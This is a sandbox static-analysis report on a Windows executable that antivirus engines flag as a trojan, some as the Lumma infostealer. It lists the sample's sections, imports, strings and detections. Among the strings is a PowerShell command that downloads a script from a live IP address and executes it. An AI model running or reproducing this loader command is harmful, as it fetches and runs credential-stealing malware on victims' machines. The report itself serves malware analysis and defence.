popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

PE Compile Time

2024-11-07 03:29:43

PE Imphash

398697f041e256fb6c451f1966f76316

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00011250 0x00011400 6.48567420589
.rdata 0x00013000 0x00009b60 0x00009c00 4.7514314323
.data 0x0001d000 0x00001c60 0x00000c00 1.88495959495
.pdata 0x0001f000 0x00001134 0x00001200 4.76753970732
_RDATA 0x00021000 0x000001f4 0x00000200 3.60790093926
.rsrc 0x00022000 0x000001e0 0x00000200 4.70436301348
.reloc 0x00023000 0x0000065c 0x00000800 4.88519629284

Resources

Name Offset Size Language Sub-language File type
RT_MANIFEST 0x00022060 0x0000017d LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document text

Imports

Library KERNEL32.dll:
0x140013000 RtlCaptureContext
0x140013008 RtlLookupFunctionEntry
0x140013010 RtlVirtualUnwind
0x140013018 UnhandledExceptionFilter
0x140013028 GetCurrentProcess
0x140013030 TerminateProcess
0x140013040 QueryPerformanceCounter
0x140013048 GetCurrentProcessId
0x140013050 GetCurrentThreadId
0x140013058 GetSystemTimeAsFileTime
0x140013060 InitializeSListHead
0x140013068 IsDebuggerPresent
0x140013070 GetStartupInfoW
0x140013078 GetModuleHandleW
0x140013080 RtlUnwindEx
0x140013088 GetLastError
0x140013090 SetLastError
0x140013098 EnterCriticalSection
0x1400130a0 LeaveCriticalSection
0x1400130a8 DeleteCriticalSection
0x1400130b8 TlsAlloc
0x1400130c0 TlsGetValue
0x1400130c8 TlsSetValue
0x1400130d0 TlsFree
0x1400130d8 FreeLibrary
0x1400130e0 GetProcAddress
0x1400130e8 LoadLibraryExW
0x1400130f0 EncodePointer
0x1400130f8 RaiseException
0x140013100 RtlPcToFileHeader
0x140013108 GetStdHandle
0x140013110 WriteFile
0x140013118 GetModuleFileNameW
0x140013120 ExitProcess
0x140013128 GetModuleHandleExW
0x140013130 GetCommandLineA
0x140013138 GetCommandLineW
0x140013140 HeapFree
0x140013148 CloseHandle
0x140013150 WaitForSingleObject
0x140013158 GetExitCodeProcess
0x140013160 CreateProcessW
0x140013168 GetFileAttributesExW
0x140013170 HeapAlloc
0x140013178 FindClose
0x140013180 FindFirstFileExW
0x140013188 FindNextFileW
0x140013190 IsValidCodePage
0x140013198 GetACP
0x1400131a0 GetOEMCP
0x1400131a8 GetCPInfo
0x1400131b0 MultiByteToWideChar
0x1400131b8 WideCharToMultiByte
0x1400131c0 GetEnvironmentStringsW
0x1400131c8 FreeEnvironmentStringsW
0x1400131d0 SetEnvironmentVariableW
0x1400131d8 SetStdHandle
0x1400131e0 GetFileType
0x1400131e8 GetStringTypeW
0x1400131f0 FlsAlloc
0x1400131f8 FlsGetValue
0x140013200 FlsSetValue
0x140013208 FlsFree
0x140013210 CompareStringW
0x140013218 LCMapStringW
0x140013220 GetProcessHeap
0x140013228 HeapSize
0x140013230 HeapReAlloc
0x140013238 FlushFileBuffers
0x140013240 GetConsoleOutputCP
0x140013248 GetConsoleMode
0x140013250 SetFilePointerEx
0x140013258 CreateFileW
0x140013260 WriteConsoleW
!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@_RDATA
@.rsrc
@.reloc
u/HcH<H
WATAUAVAWH
A_A^A]A\_
WATAUAVAWH
A_A^A]A\_
VWATAVAWH
A_A^A\_^
WATAUAVAWH
A_A^A]A\_
H;xXu5
AUAVAWH
u4I9}(
;I9}(tiH
0A_A^A]
UVWATAUAVAWH
`A_A^A]A\_^]
@USVWATAUAVAWH
A_A^A]A\_^[]
UVWATAUAVAWH
A_A^A]A\_^]
@SVWATAUAVAWH
L!|$(L!
D$0HcH
pA_A^A]A\_^[
B(I9A(u
SVWATAUAVAWH
0A_A^A]A\_^[
t$ WATAUAVAWH
A_A^A]A\_
vyfffff
vyfffff
fffffff
fffffff
WATAUAVAWH
A_A^A]A\_
UVWAVAWH
0A_A^_^]
p0R^G'
u3HcH<H
WAVAWH
A_A^_
WAVAWH
A_A^_
D$0@8{
p*W4H
p*W4H
WATAUAVAWH
0A_A^A]A\_
x UAVAWH
t(LcuoH;
t$ WATAUAVAWH
A_A^A]A\_
@USVWATAUAVAWH
xA_A^A]A\_^[]
u$D8r(t
D81uUL9r
uED8r(t
vAD8s(t
u$D8r(t
fD91uTL9r
uED8r(t
v@D8s(t
UVWATAUAVAWH
PA_A^A]A\_^]
WATAUAVAWH
0A_A^A]A\_
H9>u+A
@USVWATAUAVH
D8t$ht
D8t$ht
A^A]A\_^[]
f9)u4H9j
u%@8j(t
l$ VWATAVAWH
L$&8\$&t,8Y
A_A^A\_^
UVWATAUAVAWH
xWI96tRI
0A_A^A]A\_^]
fD9t$b
@UATAUAVAWH
e0A_A^A]A\]
WATAUAVAWH
A_A^A]A\_
p0R^G'
t$ WATAUAVAWH
D!|$xA
A_A^A]A\_
L$ VWAVH
fD94H}aD
UVWATAUAVAWH
L9#t!H
:u A8N
pA_A^A]A\_^]
t$ WATAUAVAWH
0A_A^A]A\_
UATAUAVAWH
D8l$pt
D8l$pt
D8l$pt
D8l$pt
D8l$pt
D8l$pt
D8l$ptGH
D8l$pt
D8l$pt
A_A^A]A\]
ATAUAVH
L$ fff
L$ |+L;
A^A]A\
@UATAUAVAWH
A_A^A]A\]
x UAVAWH
WAVAWH
A_A^_
UVWATAUAVAWH
fB9<I}1L
A_A^A]A\_^]
VWATAVAW
A_A^A\_^
VATAUAVAWH
0A_A^A]A\^
@USVWATAUAVAWH
H!D$ H
xA_A^A]A\_^[]
WATAUAVAWH
0A_A^A]A\_
@USVWATAUAVAWH
eHA_A^A]A\_^[]
ffffff
fffffff
@SUVWATAVAWH
@A_A^A\_^][
USVWAVH
A^_^[]
LcA<E3
fffffff
ffffff
vKfffff
fffffff
fffffff
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__swift_3
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
Unknown exception
bad exception
COMSPEC
cmd.exe
CorExitProcess
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
AreFileApisANSI
CompareStringEx
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
UUUUUU
UUUUUU
=imb;D
/>58d%
VM>cQ6
>jtm}S
)>6{1n
+f)>0'
;H9>&X
*StO9>T
n03>Pu
K~Je#>!
bp(=>?g
BC?>6t9^
K&>.yC
.xJ>Hf
y\PD>!
|b=})>
c [1>H'
uzKs@>
3>N;kU
kE>fvw
V6E>`"(5
?UUUUUU
?7zQ6$
powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
.text$mn
.text$mn$00
.text$mn$21
.text$x
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$00
.rdata$r
.rdata$voltmd
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.data$rs
.pdata
_RDATA
.rsrc$01
.rsrc$02
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
GetStartupInfoW
GetModuleHandleW
RtlUnwindEx
GetLastError
SetLastError
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
GetProcAddress
LoadLibraryExW
EncodePointer
RaiseException
RtlPcToFileHeader
GetStdHandle
WriteFile
GetModuleFileNameW
ExitProcess
GetModuleHandleExW
GetCommandLineA
GetCommandLineW
HeapFree
CloseHandle
WaitForSingleObject
GetExitCodeProcess
CreateProcessW
GetFileAttributesExW
HeapAlloc
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
MultiByteToWideChar
WideCharToMultiByte
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetEnvironmentVariableW
SetStdHandle
GetFileType
GetStringTypeW
FlsAlloc
FlsGetValue
FlsSetValue
FlsFree
CompareStringW
LCMapStringW
GetProcessHeap
HeapSize
HeapReAlloc
FlushFileBuffers
GetConsoleOutputCP
GetConsoleMode
SetFilePointerEx
CreateFileW
WriteConsoleW
KERNEL32.dll
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_exception@std@@
.?AVexception@std@@
.?AVtype_info@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
mscoree.dll
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
((((( H
api-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l1-2-4
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
kernelbase
api-ms-win-appmodel-runtime-l1-1-2
user32
ext-ms-
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
Antivirus Signature
Bkav W64.AIDetectMalware
Lionic Clean
Elastic Clean
Cynet Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Cylance Unsafe
Zillya Clean
CrowdStrike win/malicious_confidence_60% (W)
Alibaba Clean
K7GW Clean
K7AntiVirus Clean
huorong Clean
Baidu Clean
Paloalto generic.ml
Symantec Clean
tehtris Clean
ESET-NOD32 a variant of Generik.DSFMISL
APEX Malicious
Avast Win64:MalwareX-gen [Trj]
ClamAV Clean
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Trojan.GenericKD.74707168
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Trojan.GenericKD.74707168
Tencent Clean
Sophos Mal/Generic-S
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro TrojanSpy.Win64.LUMMASTEALER.YXEKGZ
McAfeeD ti!A0AEB837CB5E
Trapmine Clean
CTX exe.trojan.generic
Emsisoft Trojan.GenericKD.74707168 (B)
Ikarus Trojan.SuspectCRC
FireEye Trojan.GenericKD.74707168
Jiangmin Clean
Webroot Clean
Varist Clean
Avira Clean
Fortinet PossibleThreat.RF
Antiy-AVL GrayWare/Win32.Wacapew
Kingsoft Win32.Troj.Unknown.a
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm UDS:DangerousObject.Multi.Generic
Microsoft Trojan:Win32/Wacatac.B!ml
Google Detected
AhnLab-V3 Trojan/Win.Generic.C5691559
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Malwarebytes Spyware.Lumma
Panda Clean
Zoner Clean
TrendMicro-HouseCall TrojanSpy.Win64.LUMMASTEALER.YXEKGZ
Rising Clean
Yandex Clean
SentinelOne Clean
MaxSecure Trojan.Malware.300983.susgen
GData Win64.Trojan.Agent.497GYW
AVG Win64:MalwareX-gen [Trj]
DeepInstinct MALICIOUS
alibabacloud Clean
No IRMA results available.